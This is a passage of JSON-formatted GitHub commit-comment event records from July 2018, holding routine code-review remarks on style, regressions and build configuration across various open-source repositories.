pragma to every module that uses Lib.Seq.\nIn particular, if I have a module N using M, then even though M has “—using_facts_from” I would need to add another “—using_facts_from” in N otherwise it would again load all of FStar.Seq.\nIs that correct?\n\nUsing an interface is a way to say that for all modules that use Lib.Seq, we are restricting facts to a certain set of lemmas.\nIf we could do this using some pragma like “—using_facts_from” that would be even better.\n> Anyway, since this is the style you adopted in Hacl, I'm willing to work with it for our post-quantum crypto work, I don't have any foundational objection. We started implementing Lib.Buffer on top of LowStar.Buffer in the pqcrypto branch. I don't foresee any difficulties in completing it.\n> \nThat’s great!\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/project-everest/hacl-star/commit/79de0e9a9a0da076275d041e8b8800e1b69f756f#commitcomment-29749659>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AEYAnuIwh_GRj8cH5_BXaoPLW1bmS19cks5uHzgzgaJpZM4VTQap>.\n> \n\n"}},"created_at":"2018-07-18T13:45:33Z"}
{"id":"7983074368","type":"CommitCommentEvent","actor":{"login":"picklechips"},"repo":{"name":"CGUC/grapp-client"},"payload":{"comment":{"id":29749904,"position":1,"line":30,"path":"ApiClient.js","commit_id":"0bc90daf70fdba39b3cf55e262c7812e898c7245","created_at":"2018-07-18T13:47:09Z","updated_at":"2018-07-18T13:47:09Z","author_association":"MEMBER","body":"What exactly was broken before?"}},"created_at":"2018-07-18T13:47:09Z"}
{"id":"7983083210","type":"CommitCommentEvent","actor":{"login":"AnushreeParalikar"},"repo":{"name":"GRAND-PROJECT/research_papers"},"payload":{"comment":{"id":29749927,"position":null,"line":null,"path":null,"commit_id":"b85b5c30e1bfd3cc4b541cd1b5588e6d488cbc07","created_at":"2018-07-18T13:48:32Z","updated_at":"2018-07-18T13:48:32Z","author_association":"CONTRIBUTOR","body":"[1-s2.0-S235286481730247X-main.pdf](https://github.com/GRAND-PROJECT/research_papers/files/2205995/1-s2.0-S235286481730247X-main.pdf)\r\n"}},"created_at":"2018-07-18T13:48:32Z"}
{"id":"7983086098","type":"CommitCommentEvent","actor":{"login":"sungsoo86Park"},"repo":{"name":"hyosangs/TartanAdventure-master-2team"},"payload":{"comment":{"id":29749934,"position":null,"line":null,"path":null,"commit_id":"710937a77b21ab90728b12c3452b708b53f07748","created_at":"2018-07-18T13:49:01Z","updated_at":"2018-07-18T13:49:01Z","author_association":"COLLABORATOR","body":"Modifiers should be declared in the correct order\r\nsquid : ModifiersOrderCheck\r\nThe Java Language Specification recommends listing modifiers in the following order:\r\n\r\nAnnotations\r\npublic\r\nprotected\r\nprivate\r\nabstract\r\nstatic\r\nfinal\r\ntransient\r\nvolatile\r\nsynchronized\r\nnative\r\nstrictfp\r\nNot following this convention has no technical impact, but will reduce the code's readability because most developers are used to the standard order.\r\n\r\nRefs : https://sbforge.org/sonar/rules/show/squid:ModifiersOrderCheck?layout=false"}},"created_at":"2018-07-18T13:49:01Z"}
{"id":"7983088463","type":"CommitCommentEvent","actor":{"login":"Zadezter"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29749938,"position":null,"line":null,"path":null,"commit_id":"6507bb8647253a527b4b43a03b5ec815b4904696","created_at":"2018-07-18T13:49:24Z","updated_at":"2018-07-18T13:49:24Z","author_association":"MEMBER","body":"Lol you are JS coder. If you know to add these config and particle, why don't you make a code then pull request?"}},"created_at":"2018-07-18T13:49:24Z"}
{"id":"7983089548","type":"CommitCommentEvent","actor":{"login":"rwese"},"repo":{"name":"sebkaluzny/docker-machine-ipconfig"},"payload":{"comment":{"id":29749942,"position":9,"line":69,"path":"docker-machine-ipconfig","commit_id":"aa61b6721f98ec07243fa877e651c8cd86c1c5ec","created_at":"2018-07-18T13:49:35Z","updated_at":"2018-07-18T13:49:35Z","author_association":"NONE","body":"eth0 is usually the NAT interface, the intention is to change the ip of the HOST-Only interface, this is what you use to connect to from your machine."}},"created_at":"2018-07-18T13:49:35Z"}
{"id":"7983090383","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29749946,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-18T13:49:43Z","updated_at":"2018-07-18T13:49:43Z","author_association":"MEMBER","body":"@dimisa-RUAdList, @lainverse\r\n\r\nThe filter above is for a UKR site.\r\n\r\nSince uBO supports the `!#include ...` directive (ignored by ABP), would you be willing to maintain a sub-list in RU AdList for cases like here -- that would be preferable than to keep adding these region-specific filters being part of the base list."}},"created_at":"2018-07-18T13:49:43Z"}
{"id":"7983090948","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29749947,"position":110,"line":110,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-18T13:49:49Z","updated_at":"2018-07-18T13:49:49Z","author_association":"COLLABORATOR","body":"Implemented paging with OFFSET & FETCH."}},"created_at":"2018-07-18T13:49:49Z"}
{"id":"7983093832","type":"CommitCommentEvent","actor":{"login":"veranoo"},"repo":{"name":"bitovi/funcunit"},"payload":{"comment":{"id":29749957,"position":5,"line":5,"path":"dist/amd/funcunit.js","commit_id":"9bd357e7e58d8a17ee515f6c32c2e8432d0ce97d","created_at":"2018-07-18T13:50:16Z","updated_at":"2018-07-18T13:50:16Z","author_association":"NONE","body":"Why? 👎 cc: @m-mujica @matthewp"}},"created_at":"2018-07-18T13:50:16Z"}
{"id":"7983099645","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"bitovi/funcunit"},"payload":{"comment":{"id":29749971,"position":5,"line":5,"path":"dist/amd/funcunit.js","commit_id":"9bd357e7e58d8a17ee515f6c32c2e8432d0ce97d","created_at":"2018-07-18T13:51:10Z","updated_at":"2018-07-18T13:51:10Z","author_association":"MEMBER","body":"this has to have been a mistake ...."}},"created_at":"2018-07-18T13:51:10Z"}
{"id":"7983099648","type":"CommitCommentEvent","actor":{"login":"gunnarmorling"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29749972,"position":10,"line":10,"path":"posts/Guillaume/2018-07-18-hibernate-validator-6011-final-out.adoc","commit_id":"5dbd1fb006b89fdd608772615b48f51ca255bf61","created_at":"2018-07-18T13:51:10Z","updated_at":"2018-07-18T13:51:10Z","author_association":"MEMBER","body":"s/of/for/"}},"created_at":"2018-07-18T13:51:10Z"}
{"id":"7983102638","type":"CommitCommentEvent","actor":{"login":"gunnarmorling"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29749979,"position":16,"line":16,"path":"posts/Guillaume/2018-07-18-hibernate-validator-6011-final-out.adoc","commit_id":"5dbd1fb006b89fdd608772615b48f51ca255bf61","created_at":"2018-07-18T13:51:38Z","updated_at":"2018-07-18T13:51:38Z","author_association":"MEMBER","body":"I think it's StAX."}},"created_at":"2018-07-18T13:51:38Z"}
{"id":"7983102830","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29749980,"position":null,"line":null,"path":null,"commit_id":"621c3972df0a13227badd8f8054960c2d6c8252e","created_at":"2018-07-18T13:51:40Z","updated_at":"2018-07-18T13:51:40Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-18T13:51:40Z"}
{"id":"7983103461","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29749983,"position":13,"line":13,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-18T13:51:46Z","updated_at":"2018-07-18T13:51:46Z","author_association":"COLLABORATOR","body":"As recommended, Dinka has separated the SQL constants in resource files."}},"created_at":"2018-07-18T13:51:46Z"}
{"id":"7983104381","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29749989,"position":20,"line":20,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T13:51:54Z","updated_at":"2018-07-18T13:51:54Z","author_association":"OWNER","body":"72"}},"created_at":"2018-07-18T13:51:54Z"}
{"id":"7983106546","type":"CommitCommentEvent","actor":{"login":"GailisJanis"},"repo":{"name":"MaksimsKlimanovics/WMS_Api"},"payload":{"comment":{"id":29749992,"position":4,"line":24,"path":"Controllers/BinController.cs","commit_id":"fab7a2f54a8698a482f1672abb3fd4857f4438dc","created_at":"2018-07-18T13:52:17Z","updated_at":"2018-07-18T13:52:17Z","author_association":"COLLABORATOR","body":"@MaksimsKlimanovics Neko nezinu, neesmu aizticis \r\n![image](https://user-images.githubusercontent.com/33551773/42885882-e1b28f76-8aaa-11e8-81ef-77f8dcd3eda2.png)\r\n"}},"created_at":"2018-07-18T13:52:17Z"}
{"id":"7983107440","type":"CommitCommentEvent","actor":{"login":"xabolcs"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29749993,"position":null,"line":null,"path":null,"commit_id":"2cedae0aa9befe1135c83f007942d89ec906658e","created_at":"2018-07-18T13:52:25Z","updated_at":"2018-07-18T13:52:25Z","author_association":"NONE","body":"@thess \n\nWith this change I couldn't use the `flac` encoder in the `httpd` output in `mpd-full` – with `compression 0` it was pretty usable on `qca9533`.\n\nWas this `flac` encoder removal intented?"}},"created_at":"2018-07-18T13:52:25Z"}
{"id":"7983116828","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29750013,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T13:53:56Z","updated_at":"2018-07-18T13:53:56Z","author_association":"OWNER","body":"> You might want to give me write access to your repo. Then, I can commit trivial (non-functional) changes myself.\r\n\r\nThat would be cool...now I have to check how can I achieve it with github :-)"}},"created_at":"2018-07-18T13:53:56Z"}
{"id":"7983120852","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29750019,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-18T13:54:33Z","updated_at":"2018-07-18T13:54:33Z","author_association":"MEMBER","body":"I've tried many things, but unfortunately there's not a lot we can do in layer.conf.\r\nWhen performing a 'bitbake <recipe name> users must use dm7020hd and not dm7020hdv2.\r\nAlso when building feed, users must use 'make feed' and not bitbake openpli-enigma2-feed.bb\r\nIt's not a big deal but users need to know it.\r\nOnly if you need to flash box or  need image for backup, you need to run 'MACHINE=dm7020hdv2 make image'.\r\n"}},"created_at":"2018-07-18T13:54:33Z"}
{"id":"7983121940","type":"CommitCommentEvent","actor":{"login":"Diabelino"},"repo":{"name":"jl777/btcd"},"payload":{"comment":{"id":29750025,"position":856,"line":856,"path":"btc_keyconv/include/tomcrypt_cipher.h","commit_id":"d08759a6ade14a3321b96fd0a75f8b2dfc0f5e92","created_at":"2018-07-18T13:54:43Z","updated_at":"2018-07-18T13:54:43Z","author_association":"NONE","body":"8 c n co"}},"created_at":"2018-07-18T13:54:43Z"}
{"id":"7983124087","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29750033,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-18T13:55:04Z","updated_at":"2018-07-18T13:55:04Z","author_association":"COLLABORATOR","body":"`CheckAdditionalSummon`\r\n`IsPlayerCanExtraSummon`\r\n`IsPlayerCanAdditionalSummon`\r\nwhich is better?"}},"created_at":"2018-07-18T13:55:04Z"}
{"id":"7983125304","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29750036,"position":40,"line":40,"path":"stand/efi/loader/multiboot2.c","commit_id":"6802c7fd1f0a9094ac887eba83023779a6c3c12a","created_at":"2018-07-18T13:55:16Z","updated_at":"2018-07-18T13:55:16Z","author_association":"NONE","body":"Ping? You seem to have ignored my comments here and below, please make sure all previous comments are addressed and post a new branch."}},"created_at":"2018-07-18T13:55:16Z"}
{"id":"7983126494","type":"CommitCommentEvent","actor":{"login":"Diabelino"},"repo":{"name":"jl777/btcd"},"payload":{"comment":{"id":29750040,"position":632,"line":632,"path":"btc_keyconv/include/tomcrypt_cipher.h","commit_id":"d08759a6ade14a3321b96fd0a75f8b2dfc0f5e92","created_at":"2018-07-18T13:55:26Z","updated_at":"2018-07-18T13:55:26Z","author_association":"NONE","body":"Open key"}},"created_at":"2018-07-18T13:55:26Z"}
{"id":"7983127317","type":"CommitCommentEvent","actor":{"login":"naveenreddymanukonda"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29750044,"position":67,"line":173,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T13:55:34Z","updated_at":"2018-07-18T13:55:34Z","author_association":"NONE","body":"thanks @pratapvardhan "}},"created_at":"2018-07-18T13:55:34Z"}
{"id":"7983131317","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29750054,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T13:56:12Z","updated_at":"2018-07-18T13:56:12Z","author_association":"OWNER","body":"https://github.com/palinek/pvr.sledovanitv.cz/invitations"}},"created_at":"2018-07-18T13:56:12Z"}
{"id":"7983133251","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29750063,"position":null,"line":null,"path":null,"commit_id":"42e677c4c0783b2d0a89fbf596aa7f7a814560f4","created_at":"2018-07-18T13:56:29Z","updated_at":"2018-07-18T13:56:29Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-18T13:56:29Z"}
{"id":"7983135928","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29750068,"position":88,"line":88,"path":"stand/efi/loader/multiboot2.c","commit_id":"6802c7fd1f0a9094ac887eba83023779a6c3c12a","created_at":"2018-07-18T13:56:54Z","updated_at":"2018-07-18T13:56:54Z","author_association":"NONE","body":"Also this line is too long, please keep lines to 80 characters maximum."}},"created_at":"2018-07-18T13:56:54Z"}
{"id":"7983138224","type":"CommitCommentEvent","actor":{"login":"naveenreddymanukonda"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29750076,"position":81,"line":187,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T13:57:15Z","updated_at":"2018-07-18T13:57:15Z","author_association":"NONE","body":"yes implemented @pratapvardhan :)"}},"created_at":"2018-07-18T13:57:15Z"}
{"id":"7983139087","type":"CommitCommentEvent","actor":{"login":"peanderson2016"},"repo":{"name":"jenkinsci/durable-task-plugin"},"payload":{"comment":{"id":29750079,"position":null,"line":null,"path":null,"commit_id":"c92e72d127570c7b5727a89a9e63d76d0e476c95","created_at":"2018-07-18T13:57:23Z","updated_at":"2018-07-18T13:57:23Z","author_association":"NONE","body":"I am not sure we should be changing the default encoding for PowerShell (https://blogs.msdn.microsoft.com/powershell/2006/12/11/outputencoding-to-the-rescue/). This creates a disconnect when developing scripts that interact with native applications.\r\n\r\nAt the moment we are experiencing an issue within our tool chain after moving from to the latest version of the durability plugin (1.22). Currently, I am not able to replicate the exact error outside of our tool chain + jenkins. We can work around this by changing the encoding back to 850 (default for our region): \r\n`[System.Console]::OutputEncoding = [System.Console]::InputEncoding  = [System.Text.Encoding]::GetEncoding(850);`\r\n\r\nWhat was the rational behind changing the default encoding? "}},"created_at":"2018-07-18T13:57:23Z"}
{"id":"7983141073","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29750089,"position":null,"line":null,"path":null,"commit_id":"1685da5efdc5475fc628897026a6a0bd69cb0b65","created_at":"2018-07-18T13:57:41Z","updated_at":"2018-07-18T13:57:41Z","author_association":"COLLABORATOR","body":"Desktop wäre doch ok?"}},"created_at":"2018-07-18T13:57:41Z"}
{"id":"7983145553","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29750100,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T13:58:21Z","updated_at":"2018-07-18T13:58:21Z","author_association":"CONTRIBUTOR","body":"I imagine all `Step`s in `DynamicHoneyBadger` will either be `Step<DynamicHoneyBadger<…>>` or `Step<HoneyBadger<…>>`.\r\n\r\nThe one you're quoting would be a `Step<HoneyBadger<InternalContrib<C, NodeUid>, NodeUid>>`, wouldn't it?"}},"created_at":"2018-07-18T13:58:21Z"}
{"id":"7983146006","type":"CommitCommentEvent","actor":{"login":"Aymanla"},"repo":{"name":"Aymanla/Bank_loan_approval"},"payload":{"comment":{"id":29750102,"position":null,"line":null,"path":null,"commit_id":"615bdc07f4ed7c7c053fd32bbe70b1ef60353dd0","created_at":"2018-07-18T13:58:25Z","updated_at":"2018-07-18T13:58:25Z","author_association":"OWNER","body":"changed a comment"}},"created_at":"2018-07-18T13:58:25Z"}
{"id":"7983147904","type":"CommitCommentEvent","actor":{"login":"xabolcs"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29750104,"position":null,"line":null,"path":null,"commit_id":"2cedae0aa9befe1135c83f007942d89ec906658e","created_at":"2018-07-18T13:58:42Z","updated_at":"2018-07-18T13:58:42Z","author_association":"NONE","body":"Sure, I don't need especially `flac`, just an encoder which **works** and is compressed."}},"created_at":"2018-07-18T13:58:42Z"}
{"id":"7983147998","type":"CommitCommentEvent","actor":{"login":"rodrigopedra"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29750105,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-18T13:58:43Z","updated_at":"2018-07-18T13:58:43Z","author_association":"CONTRIBUTOR","body":"I had a production issue with it also. Previously I passed an array as a parameter, after the update I got the same error as @ortegon000 reported. Luckly I used it only in one place of the project so it was a minor outage.\r\n\r\n~~~~php\r\n// previously\r\nif ($request->is( [ 'pathA', 'pathB' ] )) { /* ... */ } // crashes after this update\r\n\r\n// currently\r\nif ($request->is( 'pathA', 'pathB' )) { /* ... */ } // remove the array brackets in the argument list\r\n~~~~\r\n"}},"created_at":"2018-07-18T13:58:43Z"}
{"id":"7983149266","type":"CommitCommentEvent","actor":{"login":"Aymanla"},"repo":{"name":"Aymanla/Bank_loan_approval"},"payload":{"comment":{"id":29750108,"position":null,"line":null,"path":null,"commit_id":"54a62b9d4acbd23152983a9bd3e732b5f5da1ecc","created_at":"2018-07-18T13:58:55Z","updated_at":"2018-07-18T13:58:55Z","author_association":"OWNER","body":"added comments"}},"created_at":"2018-07-18T13:58:55Z"}
{"id":"7983149745","type":"CommitCommentEvent","actor":{"login":"pratapvardhan"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29750109,"position":45,"line":112,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T13:58:59Z","updated_at":"2018-07-18T13:58:59Z","author_association":"NONE","body":"`'{:d} duplicate columns'` instead?"}},"created_at":"2018-07-18T13:58:59Z"}
{"id":"7983154951","type":"CommitCommentEvent","actor":{"login":"Aymanla"},"repo":{"name":"Aymanla/Bank_loan_approval"},"payload":{"comment":{"id":29750120,"position":null,"line":null,"path":null,"commit_id":"4b103c1af17a0b30f8381fcb7c9d790fbf384361","created_at":"2018-07-18T13:59:46Z","updated_at":"2018-07-18T13:59:46Z","author_association":"OWNER","body":"removing unnecessary space"}},"created_at":"2018-07-18T13:59:46Z"}
{"id":"7983158939","type":"CommitCommentEvent","actor":{"login":"mojojojo8"},"repo":{"name":"mojojojo8/netauto"},"payload":{"comment":{"id":29750134,"position":null,"line":null,"path":null,"commit_id":"264608e5e0a7243ca37922b916106cc50e4fd425","created_at":"2018-07-18T14:00:21Z","updated_at":"2018-07-18T14:00:21Z","author_association":"OWNER","body":"asasas"}},"created_at":"2018-07-18T14:00:21Z"}
{"id":"7983162414","type":"CommitCommentEvent","actor":{"login":"neilbrub"},"repo":{"name":"CGUC/grapp-client"},"payload":{"comment":{"id":29750142,"position":1,"line":30,"path":"ApiClient.js","commit_id":"0bc90daf70fdba39b3cf55e262c7812e898c7245","created_at":"2018-07-18T14:00:54Z","updated_at":"2018-07-18T14:00:54Z","author_association":"MEMBER","body":"From a functionality standpoint, editing or adding comments caused an error (would alert '`Error updating post`'). In the code, we were calling `reloadParent()` (which was set to `updatePost`) from the Comments view without any arguments, which would try to update a post with an `undefined` id - wasn't sure why we needed to do the http request for updating the post in the parent view while doing other requests in `Comments`, so just moved it all to `Comments` and so the only interaction between the two views is exposing the `updateState` method of `Feed` to be accessed whenever `Comments` updates data for a post.\r\nSorry if I didn't fully understand and screwed up an intentional design, happy to have it changed as long as it works :p"}},"created_at":"2018-07-18T14:00:54Z"}
{"id":"7983162501","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29750144,"position":null,"line":null,"path":null,"commit_id":"13fd7fc6255a9d327dd2aed2b549ac15dcf0c19f","created_at":"2018-07-18T14:00:54Z","updated_at":"2018-07-18T14:00:54Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-18T14:00:54Z"}
{"id":"7983163456","type":"CommitCommentEvent","actor":{"login":"jonathonmcmurray"},"repo":{"name":"AquaQAnalytics/TorQ"},"payload":{"comment":{"id":29750146,"position":5,"line":338,"path":"code/handlers/trackservers.q","commit_id":"7cffc1b30e85ffa7fb6b2f9afb2e7a54010ac179","created_at":"2018-07-18T14:01:03Z","updated_at":"2018-07-18T14:01:03Z","author_association":"MEMBER","body":"instead of passing in `process` can you just use `.proc.name` ? (this is included in log output anyway, so it's probably not super important anyway)"}},"created_at":"2018-07-18T14:01:03Z"}
{"id":"7983165284","type":"CommitCommentEvent","actor":{"login":"ludivinecp"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29750150,"position":2,"line":3,"path":"decidim-budgets/lib/decidim/extends/project_extend.rb","commit_id":"b601871ee74c4860c248c3049a7a9f58c2dea669","created_at":"2018-07-18T14:01:20Z","updated_at":"2018-07-18T14:01:20Z","author_association":"NONE","body":"The commentable module contains methods with the default behaviour. If you need a specific behaviour for one of your class that include the commentable module, you can simply override the Commentable#method by rewriting it in your corresponding class."}},"created_at":"2018-07-18T14:01:20Z"}
{"id":"7983169655","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29750157,"position":null,"line":null,"path":null,"commit_id":"07e76cf87e9f2cb8dbed6723fbdd960e8e0e6cdf","created_at":"2018-07-18T14:02:01Z","updated_at":"2018-07-18T14:02:01Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-18T14:02:01Z"}
{"id":"7983170067","type":"CommitCommentEvent","actor":{"login":"maxxer"},"repo":{"name":"2amigos/yii2-usuario"},"payload":{"comment":{"id":29750159,"position":5,"line":103,"path":"src/User/resources/views/settings/account.php","commit_id":"19eb9df623063f9afc3959dfded53c7bf59f1f4d","created_at":"2018-07-18T14:02:05Z","updated_at":"2018-07-18T14:02:05Z","author_association":"COLLABORATOR","body":"Sorry for the late reply. I'd like to leave the coming release as consistent as possible, so as said above I don't want to ask translators to make additional job or leave the release with a single untranslated string.\r\n\r\nPlease file a new bug (or PR) with the corrected string, I'll fix/merge after 1.5 release. Thank you very much"}},"created_at":"2018-07-18T14:02:05Z"}
{"id":"7983172491","type":"CommitCommentEvent","actor":{"login":"MaksimsKlimanovics"},"repo":{"name":"MaksimsKlimanovics/WMS_Api"},"payload":{"comment":{"id":29750162,"position":4,"line":24,"path":"Controllers/BinController.cs","commit_id":"fab7a2f54a8698a482f1672abb3fd4857f4438dc","created_at":"2018-07-18T14:02:26Z","updated_at":"2018-07-18T14:02:26Z","author_association":"OWNER","body":"@GailisJanis \r\n\r\nPar cik biju tev to rādījis - vainīgs esi tu!\r\n\r\n![image](https://user-images.githubusercontent.com/33551231/42886469-4e4e2054-8aac-11e8-8771-cf859813920c.png)\r\n"}},"created_at":"2018-07-18T14:02:26Z"}
{"id":"7983178402","type":"CommitCommentEvent","actor":{"login":"rodrigopedra"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29750180,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-18T14:03:21Z","updated_at":"2018-07-18T14:03:21Z","author_association":"CONTRIBUTOR","body":"I think it is a regression as in many places in the framework you can opt to use an array or rely on the spread operator, such as middleware only/expcet options, array helper funcions (eg. array_only), request only/except, and many other places.\r\n\r\nI prefer to use arrays when passing this multiple arguments, just for personal preference, I can adjust my mindset, but maybe we need a test to avoid breaking apps with this kind of updates"}},"created_at":"2018-07-18T14:03:21Z"}
{"id":"7983178638","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750181,"position":41,"line":41,"path":"sys/xen/busdma_xen.h","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:03:24Z","updated_at":"2018-07-18T14:03:24Z","author_association":"NONE","body":"Extra space between * and xen_dmamap_get_grefs."}},"created_at":"2018-07-18T14:03:24Z"}
{"id":"7983186583","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29750206,"position":null,"line":null,"path":null,"commit_id":"a5a130b95af6a6c1ea2e710ba435ea4dc3ee4372","created_at":"2018-07-18T14:04:37Z","updated_at":"2018-07-18T14:04:37Z","author_association":"MEMBER","body":"awesome"}},"created_at":"2018-07-18T14:04:37Z"}
{"id":"7983187709","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29750209,"position":23,"line":23,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:04:48Z","updated_at":"2018-07-18T14:04:48Z","author_association":"OWNER","body":"var souninja = true"}},"created_at":"2018-07-18T14:04:48Z"}
{"id":"7983189820","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750215,"position":34,"line":34,"path":"sys/xen/busdma_xen.h","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:05:09Z","updated_at":"2018-07-18T14:05:09Z","author_association":"NONE","body":"You don't need parentheses around the 16."}},"created_at":"2018-07-18T14:05:09Z"}
{"id":"7983190247","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29750216,"position":5,"line":181,"path":"examples/simulation.rs","commit_id":"b753b0681c08f3f2d37c5aa1fc8e02cbc51141a1","created_at":"2018-07-18T14:05:12Z","updated_at":"2018-07-18T14:05:12Z","author_association":"CONTRIBUTOR","body":"That's right! We should check if `clippy` thinks that to be a \"complex\" type though. The `<_>` has a depth of 3."}},"created_at":"2018-07-18T14:05:12Z"}
{"id":"7983195071","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29750224,"position":13,"line":15,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T14:05:58Z","updated_at":"2018-07-18T14:05:58Z","author_association":"NONE","body":"Здесь не нужен булевский параметр, поскольку понятия возрастания и убывания достигаются компаратором и для Вашего обобщенного решения могут принимать для разных типов разный смысл!"}},"created_at":"2018-07-18T14:05:58Z"}
